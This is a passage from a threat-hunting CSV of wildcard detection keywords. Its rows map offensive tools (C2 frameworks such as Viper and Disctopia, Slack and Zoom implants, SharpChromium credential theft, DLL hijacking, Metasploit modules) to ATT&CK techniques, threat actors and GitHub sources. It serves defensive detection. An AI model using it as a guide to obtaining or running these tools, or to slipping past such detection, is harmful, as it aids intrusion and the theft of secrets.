T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_PingByPython.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_PortScanByPython.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_PortScanWithServiceByPython.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkShareDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_PermissionGroupsDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_QueryRegistry_GetDotNetVersions.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_QueryRegistry_GetRDPPort.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_RemoteSystemDiscovery_GetDomainIPAddress.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_RemoteSystemDiscovery_GetNetComputer.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_RemoteSystemDiscovery_GetNetDomain.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_RemoteSystemDiscovery_GetNetDomainController.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_SecuritySoftwareDiscovery_ListAVByTasklist.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_SystemNetworkConnectionsDiscovery_GetPublicIP.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_SystemUserDiscovery_GetLastLoggedOn.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_SystemUserDiscovery_GetLoggedOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Disctopia Backdoor*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*disctopia-c2.git*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*disctopia-c2-main.zip*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*DiskCryptor Device Installation Disk*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*DiskCryptor driver*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*DISKCRYPTOR_MUTEX*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*diskcryptor2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*DiskCryptor-master*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*diskshadow list shadows all*","greyware_tool_keyword","diskshadow","List shadow copies using diskshadow","T1059.003 - T1059.001 - T1005","TA0002 - TA0005 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*dist*_brc4.x64.o*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*dist*_brc4.x86.o*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*dist/agent.upx.exe*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*dist/agent.windows.exe*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*dist/nanorobeus_cs.*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*dist/shadow.exe*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*dist\shadow.exe*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*ditty/ditty.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" +"*djhohnstein/SharpChromium*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*dl.wireshark.org*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*dlink_central_wifimanager_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*dlink_sharecenter_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*dlink_telnet_backdoor_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*dll* [HIJACKABLE]*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*dll\reflective_dll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","0","N/A","10",,"N/A",,, +"*dll_generator.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*dll_hijack_detect_x64*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*dll_hijack_detect_x86*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*dll_hijack_hunter*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" +"*DLL_Imports_BOF*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" +"*dll_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*dll_spawn_cmd.cpp*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*DLL_TO_HIJACK_WIN10*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*DllCanUnloadNow*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*dllexploit.*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" +"*DllExport -*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*DLLHijackAuditKit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*DLLHijackAuditKit.zip*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 